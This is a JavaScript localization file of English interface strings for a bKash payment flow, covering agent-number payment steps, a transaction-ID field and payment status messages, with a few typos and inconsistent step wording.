export default {
  bkash__how_to_pay: 'How to make the payment?',
  bkash__make_payment_first: 'Make the payment first',
  bkash__amount_label: 'Amount',
  bkash__step_copy_agent: 'From your account number field, copy the payment number.',
  bkash__agent_number_label: 'bKash Agent Number:',
  bkash__step_open_app: 'Go to the bKash app, then select “Cash Out.”',
  bkash__step_paste_account: 'Paste the account number and select “From Agent.”',
  bkash__step_enter_trx: 'Then, copy the transaction ID and paste it in the transaction ID field.',
  bkash__trx_placeholder: 'Transaction number – AA**',
  bkash__trx_tooltip:
    'Past the ID you will receive \n' + 'after completing your bKash \n' + 'transaction\n',
  bkash__agent_tooltip:
    'This is an Аgent number. Please \n' + 'use the ‘Payment’ option in \n' + 'your bKash app.',
  bkash__trx_error: 'Only Latin letters and digits are allowed. No spaces or special characters.',
  bkash__confirm: 'Confirm',

  // Status page
  bkash_status__success_title: 'Payment Successful',
  bkash_status__success_subtitle: 'Transaction was processed successfully',
  bkash_status__processing_title: 'Processing',
  bkash_status__processing_subtitle: 'Transaction is being processed',
  bkash_status__expired_title: 'Session timed out',
  bkash_status__expired_subtitle: 'Your session has timed out for security reasons',
  bkash_status__failed_title: 'Transaction Failed',
  bkash_status__failed_subtitle: 'A payment attempt was not completed',
  bkash_status__payment_details: 'Payment details',
  bkash_status__payment_date: 'Payment date',
  bkash_status__initiation_date: 'Initiation date',
  bkash_status__invoice_ref: 'Invoice/Reference',
  bkash_status__return_btn: 'Return to website',
  bkash_status__footer_text: '© 2025 bKash, All Rights Reserved',
};
